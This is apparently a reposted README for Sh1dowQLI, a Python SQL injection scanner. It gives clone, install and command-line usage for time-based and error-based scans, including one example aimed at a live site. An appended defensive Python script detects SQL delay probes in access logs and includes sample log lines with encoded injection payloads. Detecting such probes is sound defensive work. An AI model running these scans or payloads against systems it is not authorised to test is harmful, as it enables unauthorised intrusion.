Sh1dowQLI: A Python-Based SQL Injection Vulnerability Scanner


About Sh1dowQLI

A Python-based SQL injection scanner designed to detect SQL vulnerabilities in web applications. The tool supports error-based and blind SQL injection techniques.

Features

  • Error-based SQL injection scanning
  • Time-based SQL injection scanning
  • User-friendly interface

Requirements

Before using the tool, make sure the following environment is in place:

1. Python 3.6+ installed.
2. Required Python libraries:
   - `colorama`
   - `requests`

To install the dependencies, run:

pip install colorama requests

Installation

Clone this repository:

git clone https://github.com/HexShad0w/Sh1dowQLI.git

cd Sh1dowQLI

Run the tool:

python3 sh1dowqli.py

Or use command-line arguments for faster automated scans:

-u: specify the target URL
-f: file containing multiple URLs
-p: load a custom payload file
-o: save the results to a file

python3 time-based.py -u "<target-url>" -p payloads/time_based.txt -o output.txt
python3 error-based.py -u "<target-url>" -p payloads/error_based.txt -o output.txt

Usage example

python3 time-based.py -u "https://www.ddosi.org/?s=*" -p payloads/time_based.txt -o output.txt

payloads

error_based.txt


time_based.txt

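
For defenders, the time-based technique this scanner automates is visible in web access logs: the request carries a database delay call, and if the parameter is injectable the response time rises by roughly that delay. The following is an added example, not part of Sh1dowQLI or the original post; the log layout (nginx-style, with the request time in seconds as the last field), the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Delay primitives used by time-based SQLi probes (MySQL, PostgreSQL, MSSQL, SQLite).
DELAY_RE = re.compile(
    r"\b(?:pg_)?sleep\s*\(\s*(\d+)"            # SLEEP(5), pg_sleep(5)
    r"|waitfor\s+delay\s+'(\d+):(\d+):(\d+)"  # WAITFOR DELAY '0:0:5'
    r"|\b(?:benchmark|randomblob)\s*\(",       # CPU / memory burners
    re.IGNORECASE,
)
# Assumed layout: client ... "METHOD target PROTO" status bytes request_time
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) [^"]*" \d{3} \S+ ([\d.]+)$')

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /?s=test HTTP/1.1" 200 512 0.041',
    '203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /?s=1%27%20or%20sleep(5)%23 HTTP/1.1" 200 512 0.038',
    '203.0.113.7 - - [01/Jan/2025:10:00:09 +0000] "GET /item?id=1%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1" 200 512 5.112',
    '198.51.100.4 - - [01/Jan/2025:10:01:00 +0000] "GET /blog/how-to-sleep-better HTTP/1.1" 200 900 0.020',
]

def classify(line, burner_threshold=3.0):
    """Return (client, verdict, decoded_target) for a delay probe, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target, elapsed = m.group(1), m.group(2), float(m.group(3))
    decoded = unquote_plus(unquote_plus(target))  # tolerate double URL-encoding
    hit = DELAY_RE.search(decoded)
    if not hit:
        return None
    if hit.group(1):                     # SLEEP(n) / pg_sleep(n)
        wanted = int(hit.group(1))
    elif hit.group(2):                   # WAITFOR DELAY 'h:m:s'
        wanted = int(hit.group(2)) * 3600 + int(hit.group(3)) * 60 + int(hit.group(4))
    else:                                # BENCHMARK / RANDOMBLOB: no explicit delay
        wanted = burner_threshold
    wanted = max(wanted, 1)              # sleep(0) must not count as an observed delay
    # A response at least as slow as the requested delay suggests the call executed.
    verdict = "delay-observed" if elapsed >= wanted else "probe-only"
    return client, verdict, decoded

def scan(lines):
    return [r for r in map(classify, lines) if r]

if __name__ == "__main__":
    for client, verdict, target in scan(SAMPLE_LOG):
        print(f"{verdict:14} {client:15} {target}")
```

A `delay-observed` result marks a parameter to review first for string-built queries and to move to parameterized statements; `probe-only` indicates scanning that the application handled without stalling.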


Download

https://github.com/HexShad0w/Sh1dowQLI/archive/refs/heads/main.zip
